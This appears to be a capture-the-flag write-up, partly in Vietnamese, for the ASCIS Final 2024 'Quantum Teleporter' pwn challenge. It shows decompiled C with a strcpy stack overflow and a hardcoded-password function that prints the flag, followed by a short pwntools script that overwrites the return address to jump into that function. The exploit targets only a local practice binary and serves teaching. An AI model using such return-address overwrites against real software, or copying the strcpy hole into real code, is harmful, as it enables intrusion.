ASCIS Final 2024

RUN NOW

Vulnerability: Chương trình tin rằng kích thước src <= dest, nhưng dùng strcpy() để copy 128 bytes vào buffer 64 bytes, dẫn đến stack buffer overflow.

January 13, 2026 October 15, 2025 Easy
Author Author Hung Nguyen Tuong

Source Code

main() 

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  int choice; // [rsp+Ch] [rbp-84h] BYREF
  char buffer[128]; // [rsp+10h] [rbp-80h] BYREF

  setup(argc, argv, envp);
  v3 = time(0);
  srand(v3);
  while ( 1 )
  {
    puts("\nQuantum Teleporter Menu:");
    puts("1. Enter coordinates");
    puts("2. View current coordinates");
    puts("3. Initiate teleportation");
    puts("4. Exit");
    printf("Enter your choice: ");
    scanf("%d", &choice);
    getchar();
    if ( choice == 4 )
      break;
    if ( choice > 4 )
      goto invalid_choice;
    switch ( choice )
    {
      case 3:
        teleport();
        break;
      case 1:
        printf("Enter quantum coordinates: ");
        fgets(buffer, 128, stdin);
        quantum_entangle(buffer);
        break;
      case 2:
        print_coordinates();
        break;
      default:
invalid_choice:
        puts("Invalid choice. Please try again.");
        break;
    }
  }
  puts("Exiting Quantum Teleporter. Goodbye!");
  return 0;
}

quantum_entangle() 

char *__fastcall quantum_entangle(const char *buffer)
{
  char dest[64]; // [rsp+10h] [rbp-40h] BYREF

  return strcpy(dest, buffer);
}

print_coordinates() 

int print_coordinates()
{
  int Z; // r12d
  int Y; // ebx
  int X; // eax

  Z = rand() % 1000;
  Y = rand() % 1000;
  X = rand();
  return printf("Current coordinates: X=%d, Y=%d, Z=%d\n", X % 1000, Y, Z);
}

teleport() 

int teleport()
{
  puts("Initiating quantum teleportation...");
  sleep(2u);
  return puts("Teleportation successful!");
}

secret_lab() 

int secret_lab()
{
  char pw[16]; // [rsp+0h] [rbp-10h] BYREF

  printf("Enter the secret lab password: ");
  fgets(pw, 16, stdin);
  pw[strcspn(pw, "\n")] = 0;
  if ( strcmp(pw, "qu4ntumR3ality") )
  {
    puts("Access denied. Intruder alert!");
    exit(1);
  }
  puts("Access granted to the secret lab!");
  return system("cat flag.txt");
}

Mitigation

Solve

Chỉ cần ghi đè đến return address đến return system("cat flag.txt"); là xong.

Script 

from pwn import *

p = process('./chall')
elf = ELF('./chall')

p.sendlineafter(b'choice: ', b'1')

p.sendlineafter(b'coordinates: ', b'a' * 72 + p64(elf.symbols['secret_lab'] + 120))

print(p.recvall().decode())
BugBounty